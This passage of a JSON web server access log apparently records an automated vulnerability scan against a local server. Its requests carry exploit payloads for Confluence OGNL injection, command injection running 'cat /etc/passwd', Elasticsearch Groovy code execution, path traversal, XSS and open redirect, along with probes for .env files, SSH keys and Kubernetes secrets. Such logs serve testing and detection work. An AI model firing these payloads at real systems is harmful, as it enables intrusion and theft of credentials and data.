5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /httpd.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /test.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.018","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ssl/localhost.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger-ui.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /confluence/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"{\x0D\x0A \x22name\x22: \x22test\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /website/blog/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.037","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.dev.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"{\x22action\x22:\x22SSLVPN_Resource\x22,\x22method\x22:\x22deleteImage\x22,\x22data\x22:[{\x22data\x22:[\x22/var/www/html/d.txt;cat /etc/passwd >/var/www/html/poc.txt\x22]}],\x22type\x22:\x22rpc\x22,\x22tid\x22:17,\x22f8839p7rqtj\x22:\x22=\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /directdata/direct/router HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/user.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"{\x22type\x22:\x22index\x22,\x22spec\x22:{\x22type\x22:\x22index\x22,\x22ioConfig\x22:{\x22type\x22:\x22index\x22,\x22firehose\x22:{\x22type\x22:\x22http\x22,\x22uris\x22:[\x22 file:///etc/passwd \x22]}},\x22dataSchema\x22:{\x22dataSource\x22:\x22sample\x22,\x22parser\x22:{\x22type\x22:\x22string\x22, \x22parseSpec\x22:{\x22format\x22:\x22regex\x22,\x22pattern\x22:\x22(.*)\x22,\x22columns\x22:[\x22a\x22],\x22dimensionsSpec\x22:{},\x22timestampSpec\x22:{\x22column\x22:\x22no_ such_ column\x22,\x22missingValue\x22:\x222010-01-01T00:00:00Z\x22}}}}},\x22samplerConfig\x22:{\x22numRows\x22:500,\x22timeoutMs\x22:15000}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /druid/indexer/v1/sampler?for=connect HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webpack.config.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ////example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/namespaces/default/secrets HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /files.md5 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /aws.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ssl/127.0.0.1.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/ui/swagger-ui.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /confluence/pages/createpage-entervariables.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"{\x22size\x22:1, \x22script_fields\x22: {\x22lupin\x22:{\x22lang\x22:\x22groovy\x22,\x22script\x22: \x22java.lang.Math.class.forName(\x5C\x22java.lang.Runtime\x5C\x22).getRuntime().exec(\x5C\x22cat /etc/passwd\x5C\x22).getText()\x22}}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_search HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.development.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /poc.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1/metadata HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/sso/v2/sso/jwt?error_url=http://evil.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/2/resolution HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ////example.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /testrail/files.md5 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/gtranslate/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /main/blank?message_success=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /id_rsa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/ui/index HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wiki/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.prod HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"{}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /aura HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1/tasks HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-----------------------------154934846911423734231554128137\x0D\x0AContent-Disposition: form-data; name=\x22upload\x22; filename=\x2229KAneyv77PBMzT0WpLALrqCQcV.php\x22\x0D\x0AContent-Type: application/x-php\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A-----------------------------154934846911423734231554128137--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /clients/editclient.php?id=29KAneyv77PBMzT0WpLALrqCQcV&action=update HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Catalog/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cache/backup/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"username=admin&password=admin?show+webmaster+user","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../conf/config.properties HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ////example.com@/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /js../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /resin-doc/viewfile/?file=/WEB-INF/resin-web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /main/blank?message_error=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"action=setup_wizard_cancel&html_response_page=ftpserver.asp&html_response_return_page=ftpserver.asp","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply_sec.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /id_dsa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wiki/pages/createpage-entervariables.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.prod.local 